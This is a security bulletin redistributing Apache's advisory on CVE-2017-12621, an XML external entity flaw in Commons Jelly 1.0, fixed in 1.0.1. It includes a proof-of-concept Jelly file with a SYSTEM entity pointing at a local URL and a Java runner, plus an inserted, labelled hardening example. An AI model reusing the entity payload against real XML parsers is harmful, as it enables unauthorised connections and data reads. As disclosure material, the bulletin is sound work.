ESB-2017.2446 - [Win][UNIX/Linux] Apache Commons Jelly: Provide misleading information - Remote/unauthenticated 2017-09-28



===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2017.2446
         CVE-2017-12621: Apache Commons Jelly connects to URL with
                        custom doctype definitions.
                             28 September 2017

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:          Apache Commons Jelly
Publisher:        The Apache Software Foundation
Operating System: UNIX variants (UNIX, Linux, OSX)
                  Windows
Impact/Access:    Provide Misleading Information -- Remote/Unauthenticated
                  Access Confidential Data       -- Remote/Unauthenticated
Resolution:       Patch/Upgrade
CVE Names:        CVE-2017-12621  

---------------------------BEGIN INCLUDED TEXT--------------------

CVE-2017-12621: Apache Commons Jelly connects to URL with custom doctype definitions.

Severity: Medium

Vendor:
The Apache Software Foundation

Versions Affected:
commons-jelly-1.0 (core), namely commons-jelly-1.0.jar

Description:
During Jelly (XML) file parsing with Apache Xerces, if a custom doctype entity
is declared as a "SYSTEM" entity with a URL and that entity is used in the body
of the Jelly file, the parser will attempt to connect to that URL when it is
instantiated. This can lead to XML External Entity (XXE) attacks. The Open Web
Application Security Project (OWASP) describes the recommended fix at
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#XMLReader

Mitigation:
1.0 users should migrate to 1.0.1.
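For Jelly itself the fix is the 1.0.1 upgrade above. The following is an added example, not code from the advisory or from Apache Commons Jelly, showing the OWASP XMLReader hardening the description points to, applied to a document with the same DOCTYPE shape as example.jelly. The class name HardenedJellyParse and the constructed sample document are assumptions; the hardened reader refuses the DOCTYPE before any SYSTEM entity can be resolved, so no outbound connection is made.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.XMLReader;

public class HardenedJellyParse {

    // Constructed sample (not from the advisory): same DOCTYPE shape as example.jelly.
    static final String SAMPLE_DOC = "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM \"http://127.0.0.1:4444/\"> ]>\n"
        + "<r>&sp;</r>\n";

    // Builds a Xerces-backed SAX reader configured per the OWASP XXE cheat sheet.
    static XMLReader hardenedReader() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any DOCTYPE outright: no internal subset, no entity declarations.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth if a DOCTYPE ever has to be allowed: never fetch external entities or DTDs.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        XMLReader reader = factory.newSAXParser().getXMLReader();
        // Any remaining entity lookup resolves to an empty document instead of a network fetch.
        reader.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
        return reader;
    }

    // Returns true when the hardened reader refuses the document because of its DOCTYPE.
    public static boolean rejectsDoctype(String xml) throws Exception {
        try {
            hardenedReader().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXParseException e) {
            // Xerces reports "DOCTYPE is disallowed" before touching the SYSTEM entity.
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("DOCTYPE rejected: " + rejectsDoctype(SAMPLE_DOC));
    }
}
```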

Example:

example.jelly
--------------
<?xml version="1.0"?>
<!---
 Licensed to the Apache Software Foundation (ASF) under one or more
 contributor license agreements.  See the NOTICE file distributed with
 this work for additional information regarding copyright ownership.
 The ASF licenses this file to You under the Apache License, Version 2.0
 (the "License"); you may not use this file except in compliance with
 the License.  You may obtain a copy of the License at
      http://www.apache.org/licenses/LICENSE-2.0
 Unless required by applicable law or agreed to in writing, software
 distributed under the License is distributed on an "AS IS" BASIS,
 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 See the License for the specific language governing permissions and
 limitations under the License.
-->
<!DOCTYPE r [
        <!ELEMENT r ANY >
        <!ENTITY sp SYSTEM "http://127.0.0.1:4444/">
        ]>
<r>&sp;</r>
<j:jelly trim="false" xmlns:j="jelly:core"
         xmlns:x="jelly:xml"
         xmlns:html="jelly:html">
</j:jelly>
--------------

ExampleParser.java
------------------
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;

import org.apache.commons.jelly.JellyContext;
import org.apache.commons.jelly.JellyException;

public class ExampleParser {

    public static void main(String[] args) throws JellyException, IOException,
                    NoSuchMethodException, IllegalAccessException, IllegalArgumentException,
                    InvocationTargetException {
        // Running the script parses example.jelly with Jelly's Xerces-backed parser;
        // with commons-jelly-1.0 the SYSTEM entity is resolved during parsing.
        JellyContext context = new JellyContext();
        context.runScript("example.jelly", null);
    }
}

Credit:
This was discovered by Luca Carettoni of Doyensec.

References:
[1] http://commons.apache.org/jelly/security-reports.html
[2] https://issues.apache.org/jira/browse/JELLY-293

---------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================